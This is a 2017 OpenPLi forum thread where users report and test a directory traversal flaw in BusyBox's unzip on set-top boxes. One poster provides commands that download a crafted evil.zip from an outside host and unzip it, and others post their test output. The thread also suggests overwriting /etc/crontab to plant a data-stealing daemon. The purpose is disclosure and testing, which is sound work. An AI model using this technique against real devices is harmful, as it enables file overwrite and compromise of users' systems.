27 replies to this topic

[samsamsam]

Hello,

 

Maybe someone read this article:

http://blog.checkpoi...in-translation/

 

It seems that in OpenPLI unzip version from busybox is used.

This version of unzip does not have protection for "Directory traversal vulnerability".

It means that it "allows to overwrite or create arbitrary files via relative filenames and thus executing malicious code, e.g. by writing to /etc/ld.so.preload, ~/.bashrc etc."

 

In full unzip version this was fixed in 2003-07-11, unzip-5.50-r2:

http://www.linuxsecu...iew/105186/104/

 

So, I strongly recommended to disable applet unzip in busybox configuration and use full unzip utility.

 

Regards,

SSS

[WanWizard]

Thanks for reporting it, I'll pass it on.

[samsamsam]

No problem.

 

If someone want to test this then this file can be used:

http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip

 

Example code demonstrate possible problem.

cd /tmp
mkdir -p tmp1/tmp2
wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip
unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/
ls -la /tmp/make_some_bad.elf
rm -rf /tmp/tmp1

Let think what could happen when path to file in archive will be for example ../../../../../etc/crontab .etc

We can install unknowingly demon which will be run by system without our knowledge and send to attacker our private data, or allow to connect to our STB, or use our STB to attack other devices in our network.

 

Regards,

SSS

Edited by samsamsam, 25 May 2017 - 20:58.

[betacentauri]

And samba has another vulnerability:
https://m.heise.de/n...ba-3725672.html (Sorry it's in German)

Sorry, but I think we cannot fix all vulnerabilities. There are too much. Otherwise several guys needs to check security pages and have to build patches every day. E2 boxes are not save. In case of Samba users shouldn't open ports to their boxes.

Edited by betacentauri, 26 May 2017 - 06:25.

[gawro]

Any output for samba vulnerability is in the [global] section of the smb.conf file to place the line:

 

nt pipe support = no

[WanWizard]

Everything runs as root on the box, it is an illusion that you can secure it as you can a full-blown linux installation.

 

Threat the box as what is is: an STB running an embedded OS, and don't turn it into anything else, just because it runs a form of Linux, and because "you can". 

[MastaG]

Yep.. if we would like to be secure.. then we have to make some really large changes..
One of the first being that we don't run enigma2 (and other daemons such as softcams) as root but a dedicated user which can access the hardware (like e.g. being member of the video group or something).

While we're at it, we might as well switch to systemd

Secondly.. we would need to upgrade our oe-snapshot on a weekly base (breaking the shit out of everything).. and hope the oe maintainers care for getting the latest CVE patches in asap. (or have a security officer here, taking care of it ).

[MiLo]

It seems that in OpenPLI unzip version from busybox is used.
This version of unzip does not have protection for "Directory traversal vulnerability".

Have you tested this on OpenPLi, and if so, what was the result?

And, while you're at it, there's probably a CVE for busybox to fix it, if it applies to "our" busybox. Did you find that?

[janejak]

No problem.

 

If someone want to test this then this file can be used:

http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip

 

Example code demonstrate possible problem.

cd /tmp
mkdir -p tmp1/tmp2
wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip
unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/
ls -la /tmp/make_some_bad.elf
rm -rf /tmp/tmp1

Let think what could happen when path to file in archive will be for example ../../../../../etc/crontab .etc

We can install unknowingly demon which will be run by system without our knowledge and send to attacker our private data, or allow to connect to our STB, or use our STB to attack other devices in our network.

 

Regards,

SSS

 

tested on my dm900uhd

 

root@dm900:~$ cd /tmp
root@dm900:/tmp$ mkdir -p tmp1/tmp2
root@dm900:/tmp$ wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |*******************************|   150   0:00:00 ETA
root@dm900:/tmp$ unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
root@dm900:/tmp$ ls -la /tmp/make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory
root@dm900:/tmp$ rm -rf /tmp/tmp1

[littlesat]

OpenPli on dmm900... nope!?

[MiLo]

tested on my dm900uhd
 
root@dm900:~$ cd /tmp
root@dm900:/tmp$ mkdir -p tmp1/tmp2
root@dm900:/tmp$ wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |*******************************|   150   0:00:00 ETA
root@dm900:/tmp$ unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/
Archive:  /tmp/tmp1/tmp2/evil.zip
unzip: removing leading '../../' from member names
  inflating: make_some_bad.elf
root@dm900:/tmp$ ls -la /tmp/make_some_bad.elf
ls: /tmp/make_some_bad.elf: No such file or directory
root@dm900:/tmp$ rm -rf /tmp/tmp1

If there were such thing as OpenPLi for dm900, this would only demonstrate that the box is NOT vulnerable.

[samsamsam]

@MiLo

 

No. I am not using OpenPLI at all.

Did you read my post?

 

It seems that in OpenPLI unzip version from busybox is used.

This version of unzip does not have protection for "Directory traversal vulnerability".

[WanWizard]

I don't think MiLo said that.

 

He just replied to "janjak" that the output shows that box is not volunerable, and if that is OpenPLi code, it implies that OpenPLi isn't vulnerable too...

 

Where is the error in that?

[ims]

for xp1000 will be oe5 only ? Bonus in increased + 36% imagesize for so a weak single core box?

[WanWizard]

Wrong topic?

[ims]

yes ... sorry ..., move it to oe5, pls

Edited by ims, 28 May 2017 - 18:30.

[samsamsam]

I don't think MiLo said that.

 

He just replied to "janjak" that the output shows that box is not volunerable, and if that is OpenPLi code, it implies that OpenPLi isn't vulnerable too...

 

Where is the error in that?

 

Did you read my post or not?

Do you use unzip applet from busybox or maybe full version of utility unzip?

Everything is in my post. Just read. Or if you not interested not read.

 

For my point of view further discussion does not make sense. Post of core members like  @MastaG, @WanWizard give my answer about competence.

Phrases like:

 

Everything runs as root on the box, it is an illusion that you can secure

 

 

I do not know what are you doing in your professional life, but I hope you pay more attention on your tasks.

 

Regards,

SSS

Edited by samsamsam, 28 May 2017 - 19:20.

[WanWizard]

I don't care what you write or didn't write. The comment wasn't about that. The comment was that the output of the specific example of janjak showed his installation was not vulnerable. It used your own zip file to show that.

 

Nothing more, nothing less.

 

You desperately need to do something about these meter long toes of yours, since everybody seems to constantly stand on them. Of you think they do, even if they make a remark that isn't related to you at all, like MiLo a few posts back.

[athoik]

OpenPLi 4 has problem.

Connected to xpeedc.
Escape character is '^]'.

openpli 4 xpeedc


xpeedc login: root
root@xpeedc:~# cd /tmp; mkdir -p tmp1/tmp2; wget http://iptvplayer.pl/temp/evil.zip -O /tmp/tmp1/tmp2/evil.zip; unzip  /tmp/tmp1/tmp2/evil.zip -d /tmp/tmp1/tmp2/; ls -la /tmp/make_some_bad.elf; rm -rf /tmp/tmp1;
Connecting to iptvplayer.pl (87.98.239.40:80)
evil.zip             100% |***********|   150   0:00:00 ETA
Archive:  /tmp/tmp1/tmp2/evil.zip
  inflating: ../../make_some_bad.elf
-rw-r--r--    1 root     root             6 May 28 21:28 /tmp/make_some_bad.elf
root@xpeedc:/var/volatile/tmp#
 

[blzr]

FYI

yesterday tested this on vs1500 running 'regular' openpli5 (develop branch), that uses busybox' unzip, and can only confirm that it is NOT vulnerable to this threat

Edited by blzr, 28 May 2017 - 19:36.